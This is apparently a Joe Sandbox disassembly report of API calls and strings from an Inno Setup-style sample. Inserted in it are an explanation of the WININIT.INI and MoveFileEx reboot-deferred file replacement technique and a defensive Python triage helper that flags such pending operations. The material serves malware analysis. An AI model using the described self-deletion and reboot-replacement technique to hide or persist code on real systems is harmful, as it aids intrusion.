                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC), ref: 004783CC
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                            • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                            • API String ID: 2704155762-2318956294
                                                                                            • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                            • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                            • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                            • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                              • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                            Strings
                                                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                            • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                            • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                            • Deleting directory: %s, xrefs: 00459E5B
                                                                                            • Stripped read-only attribute., xrefs: 00459E94
                                                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                            • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                            Similarity
                                                                                            • API ID: CloseErrorFindLast
                                                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                            • API String ID: 754982922-1448842058
                                                                                            • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                            • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                            • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                            • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                            APIs
                                                                                            • GetCapture.USER32 ref: 00422EA4
                                                                                            • GetCapture.USER32 ref: 00422EB3
                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                            • ReleaseCapture.USER32 ref: 00422EBE
                                                                                            • GetActiveWindow.USER32 ref: 00422ECD
                                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                            • GetActiveWindow.USER32 ref: 00422FBF
                                                                                            Similarity
                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                            • String ID:
                                                                                            • API String ID: 862346643-0
                                                                                            • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                            • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                            • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                            • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                            • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                            • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveLong$Message
                                                                                            • String ID:
                                                                                            • API String ID: 2785966331-0
                                                                                            • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                            • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                            • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                            • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042948A
                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 1583807278-0
                                                                                            • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                            • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                            • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                            • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0041DE27
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                            • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                            • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                            • String ID:
                                                                                            • API String ID: 225703358-0
                                                                                            • Opcode ID: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                                            • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                            • Opcode Fuzzy Hash: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                                            • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                            • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$Load
                                                                                            • String ID: $ $Internal error: Item already expanding
                                                                                            • API String ID: 1675784387-1948079669
                                                                                            • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                            • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                            • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                            • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                            APIs
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringWrite
                                                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                            • API String ID: 390214022-3304407042
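                                                                                             The function above is the only one in this listing that touches a reboot-time persistence mechanism: WritePrivateProfileStringA next to the strings WININIT.INI, [rename], NUL, .tmp and MoveFileEx is the classic "replace or delete a file at next reboot" routine (on Windows 9x a [rename] section in WININIT.INI, on NT-based Windows MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT, which Windows records in the Session Manager\PendingFileRenameOperations value). Installers such as Inno Setup, which the neighbouring "Inno Setup: Language" string identifies, use it to swap a staged .tmp over a locked file; a dropper can use the same path to delete itself or replace a binary after reboot. The triage helper below is an added example, not code from the report or from the sample; it parses both artifact formats and flags the entries an analyst would look at first. The two inputs are constructed for the example (the file names are invented), and the interpretation of the registry value layout follows documented Windows behaviour rather than anything observed in this report.

```python
"""Triage helper for reboot-deferred file operations (added example).

Not code from the Joe Sandbox report or from the analysed sample.
Two artifact formats are handled:
  - WININIT.INI [rename] section (Windows 9x): one `destination=source`
    line per file; destination NUL means "delete source at reboot".
  - PendingFileRenameOperations (NT-based Windows): REG_MULTI_SZ written by
    MoveFileEx(..., MOVEFILE_DELAY_UNTIL_REBOOT); (source, destination)
    pairs in NT path form (\\??\\C:\\...); empty destination means delete,
    a leading '!' on the destination means replace-existing.
Both sample inputs below are constructed; the paths are invented.
"""
from dataclasses import dataclass
from typing import List


@dataclass
class PendingOp:
    source: str
    destination: str   # "" means the source is deleted at reboot
    origin: str        # "wininit" or "registry"

    @property
    def is_delete(self) -> bool:
        return self.destination == ""

    @property
    def suspicious(self) -> bool:
        # Heuristic only: a delayed delete, or a .tmp staged over a real file,
        # is what a self-removing dropper or a silent updater leaves behind.
        return self.is_delete or self.source.lower().endswith(".tmp")


def parse_wininit_rename(text: str) -> List[PendingOp]:
    """Return the entries of the [rename] section of a WININIT.INI text."""
    ops: List[PendingOp] = []
    in_rename = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_rename = line[1:-1].strip().lower() == "rename"
            continue
        if not in_rename or "=" not in line:
            continue
        dest, src = (part.strip() for part in line.split("=", 1))
        ops.append(PendingOp(src, "" if dest.upper() == "NUL" else dest, "wininit"))
    return ops


def parse_pending_file_rename_operations(values: List[str]) -> List[PendingOp]:
    """Interpret a PendingFileRenameOperations REG_MULTI_SZ string list."""
    def nt_to_win32(path: str) -> str:
        path = path.lstrip("!")                  # '!' = MOVEFILE_REPLACE_EXISTING
        return path[4:] if path.startswith("\\??\\") else path

    ops: List[PendingOp] = []
    for i in range(0, len(values) - 1, 2):       # strings come in src/dst pairs
        src, dst = values[i], values[i + 1]
        ops.append(PendingOp(nt_to_win32(src), nt_to_win32(dst) if dst else "", "registry"))
    return ops


def triage(wininit_text: str, pfro_values: List[str]) -> List[PendingOp]:
    """Combine both sources and keep only the entries worth a second look."""
    ops = parse_wininit_rename(wininit_text) + parse_pending_file_rename_operations(pfro_values)
    return [op for op in ops if op.suspicious]


# Constructed WININIT.INI content (not from the sample): one delete, one replace.
SAMPLE_WININIT = """; constructed for the example
[rename]
NUL=C:\\WINDOWS\\TEMP\\is-ABC12.tmp
C:\\Program Files\\App\\app.exe=C:\\Program Files\\App\\is-XYZ34.tmp
"""

# Constructed PendingFileRenameOperations list (not from the sample), as the
# REG_MULTI_SZ would be read back: src, dst, src, dst ...
SAMPLE_PFRO = [
    "\\??\\C:\\Users\\user\\AppData\\Local\\Temp\\is-QRS56.tmp", "",
    "\\??\\C:\\Program Files\\App\\is-XYZ34.tmp", "!\\??\\C:\\Program Files\\App\\app.exe",
]

if __name__ == "__main__":
    for op in triage(SAMPLE_WININIT, SAMPLE_PFRO):
        action = "DELETE " + op.source if op.is_delete else f"{op.source} -> {op.destination}"
        print(f"[{op.origin}] {action}")
```

On a live NT host the registry list is read with winreg (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager, value PendingFileRenameOperations) and passed to parse_pending_file_rename_operations unchanged; the helper deliberately takes the string list rather than opening the registry itself so it runs offline against exported hives and sandbox dumps.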
                                                                                            • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                            • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                            • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                            • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                            APIs
                                                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                            • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                            • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassInfoLongMessageSendWindow
                                                                                            • String ID: COMBOBOX$Inno Setup: Language
                                                                                            • API String ID: 3391662889-4234151509
                                                                                            • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                            • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                            • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                            • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                              • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                              • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                            • API String ID: 1044490935-665933166
                                                                                            • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                            • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                            • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                            • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                              • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                              • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                            • String ID: ,$?
                                                                                            • API String ID: 2359071979-2308483597
                                                                                            • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                            • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                            • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                            • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                            APIs
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                            • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                            • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                            • String ID:
                                                                                            • API String ID: 1030595962-0
                                                                                            • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                            • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                            • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                            • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                            APIs
                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                            • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                            • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                            • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                            • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                            • String ID:
                                                                                            • API String ID: 2222416421-0
                                                                                            • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                            • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                            • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                            • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                              • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                              • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                              • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                            • TranslateMessage.USER32(?), ref: 004573B3
                                                                                            • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                            • String ID: [Paused]
                                                                                            • API String ID: 1007367021-4230553315
                                                                                            • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                            • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                            • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                            • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                            APIs
                                                                                            • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
